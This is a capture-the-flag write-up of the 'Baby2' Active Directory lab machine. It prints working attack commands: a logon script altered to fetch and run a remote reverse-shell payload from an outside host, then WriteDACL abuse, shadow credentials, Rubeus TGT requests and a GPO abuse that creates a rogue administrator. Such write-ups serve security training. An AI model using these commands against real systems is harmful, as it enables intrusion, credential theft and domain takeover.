Baby2 is a Medium difficult machine where I began with a Nmap scan revealing several open ports on the target, including SMB and LDAP. Access to SMB shares with a null password provided read/write permissions on the homes share, revealing user information and a VBS logon script in the SYSVOL share. The script was modified to execute a reverse shell, leading to access as the user Amelia Griffiths. Using BloodHound and PowerView, it was discovered that Amelia had WriteDACL rights over the GPOADM account. This privilege was used to create shadow credentials, gain a TGT, and ultimately compromise the domain by creating a new admin user, allowing full control of the system.

Enumeration

The Nmap scan shows the following ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws

I can enumerate shares with username and null password. I have READ and WRITE permission on homes share.
netexec smb 10.10.84.43 -u 'sz' -p '' --shares

Inside apps share I found a shortcut file that shows that there is a scripts folder inside SYSVOL where it’s connected to.

On homes share there is a list of users.

After brute forcing using I found 2 domain creds. And user library has both READ & WRITE access on SYSVOL share.


Inside SYSVOL I found a VBS logon script.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")    
  
    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next
    
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If
    
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
    
    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
    
    Set objNetwork = Nothing
End Sub

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

VBS Phishing

I have changed the script so that when someone login and the script executes, it will download my reverse-shell script and execute it. And then replaced the script with the original one.

1
2
3
4
5
set shell = CreateObject("WScript.Shell")
shell.Run("powershell -w hidden -ep bypass -c IEX(New-Object System.Net.WebClient).DownloadString('http://10.8.2.110/rev.ps1');")

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

After the script executed I got the reverse shell as Amelia Griffiths

Write DACL

Amelia is in some non-default Windows groups.

I ran Bloodhound to enumerate domain and ACL and Amelia is a member of Legacy and has WriteDACL on GPOADM. and GPOADM use have GenericAll to Domain Policy.
bloodhound-python -u 'Carl.Moore' -p 'Carl.Moore' -ns 10.10.73.219 -d baby2.vl -c all --auth-method auto --zip --dns-tcp

I used PowerView to make Amelia the owner of GPOADM and then give Amelia GenericAll the rights over GPOADM.

Set-DomainObjectOwner -Identity gpoadm -OwnerIdentity amelia.griffiths
Add-DomainObjectAcl -TargetIdentity "gpoadm" -PrincipalIdentity Amelia.Griffiths -Rights All

To confirm the change I used the following command.
get-aduser gpoadm | ForEach-Object {Get-ACL "AD:\$($_.DistinguishedName)" | Select-Object -ExpandProperty Owner}

Shadow Credentials

Now using the rights I can create shadow credentials.

.\Whisker.exe add /target:gpoadm /domain:baby2.vl /dc:dc.baby2.vl /path:C:\Users\Public\cert.pfx /password:Password

Using the certificate I can now generate a TGT using Rubeus.
Rubeus.exe asktgt /user:gpoadm /certificate:C:\Users\Public\cert.pfx /password:"Password" /domain:baby2.vl /dc:dc.baby2.vl /getcredentials /show

Using GPOADM NTLM hash I can create a scheduled task where it will create a new user John with Administrator privilege. pygpoabuse needs a GPO ID to abuse it.
python3 pygpoabuse.py baby2.vl/GPOADM -hashes :51B4E7AEE2FBDD4E36F2381115C8FE7A -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -f -dc-ip 10.10.73.219

Note: In Powershell Get-GPO -all also get all the GPO IDs.

To make the process faster and apply the GPO update.
gpudate /force

Now I can log in as John and get the root flag.

Password Reset

Alternatively, I could change the password of the user which is not OFFSEC-friendly.

First I can give group legacy GenericALL permission.
Add-DomainObjectAcl -TargetIdentity "GPOADM" -PrincipalIdentity legacy -Domain baby2.vl -Rights All -Verbose

Next, reset and give a new password to the GPOADM user.
Set-ADAccountPassword -Identity 'CN=GPOADM,OU=GPO-MANAGEMENT,DC=BABY2,DC=VL' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password" -Force)

Using the new password I can create a scheduled task where it will create a new user with administrator privileges.
python3 pygpoabuse.py -user 'baby2.vl/gpoadm:Password' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -f -dc-ip 10.10.73.219